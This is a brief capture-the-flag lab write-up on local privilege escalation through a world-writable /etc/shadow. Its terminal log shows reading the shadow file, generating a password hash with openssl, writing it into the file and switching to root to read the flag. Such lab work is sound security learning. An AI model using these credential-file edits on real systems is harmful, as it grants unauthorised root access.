Attack Defense | Permissions Matter

Decided to do a overview as I complete these in my spare time. check out attackdefense.com

Scenario | The admin was tasked to create a replica of an existing Linux system. He copied the entire filesystem to his computer, made modifications to some files and then copied it onto the newly provisioned system. Unfortunately, in his haste to set the new system up, he forgot to take care of permission sets. 

Your mission is to get a root shell on the box and retrieve the flag!

WARNING! — FINDINGS BELOW!

I spent a bunch of time…… like a whole bunch of time doing a bunch of stuff I had no business doing. Like: Searching directories, searching logs, versions, history, etc.

All it really took was looking at two file permissions. {smh}. We have rw-rw-rw access on the /etc/shadow file. This means we can genrate our own hash and insert it into the file ultimately creating the root password.

student@attackdefense:/home$ cat /root/^C
student@attackdefense:/home$ cat /etc/shadow
root::17764:0:99999:7::: daemon::17764:0:99999:7:::
bin::17764:0:99999:7::: sys::17764:0:99999:7:::
sync::17764:0:99999:7::: games::17764:0:99999:7:::
man::17764:0:99999:7::: lp::17764:0:99999:7:::
mail::17764:0:99999:7::: news::17764:0:99999:7:::
uucp::17764:0:99999:7::: proxy::17764:0:99999:7:::
www-data::17764:0:99999:7::: backup::17764:0:99999:7:::
list::17764:0:99999:7::: irc::17764:0:99999:7:::
gnats::17764:0:99999:7::: nobody::17764:0:99999:7:::
_apt:*:17764:0:99999:7:::
student:!:17797::::::
student@attackdefense:/home$ ls -al /etc/shadow
-rw-rw-rw- 1 root shadow 523 Sep 23 2018 /etc/shadow
student@attackdefense:/home$ nano
bash: nano: command not found
student@attackdefense:/home$ openssl passwd -1 salt root pass123
$1$4Gjx3rAa$YicC3Qx6DzMxWxtecIC/t.
$1$57lINf0T$eJvoyiH1ye5ovOtlD.Mx21
$1$UcKCqfNO$rPBh7zISXtnPmbOVHkxFF/
student@attackdefense:/home$ openssl passwd -1 -salt root pass123
$1$root$quimBCDAqK3JX3mbeqrrD1
student@attackdefense:/home$ vi /etc/shadow
student@attackdefense:/home$ $1$root$quimBCDAqK3JX3mbeqrrD1^C
student@attackdefense:/home$ vi /etc/shadow
student@attackdefense:/home$ su root
Password:
root@attackdefense:/home# cd /root/
root@attackdefense:~# ls
flag
root@attackdefense:~# cat flag
e62ab67ddff744d60cbb6232feaefc4d

All this took me about 1.5 hours. I felt kinda crappy but now know that I should pay closer attention to the title of the Labs.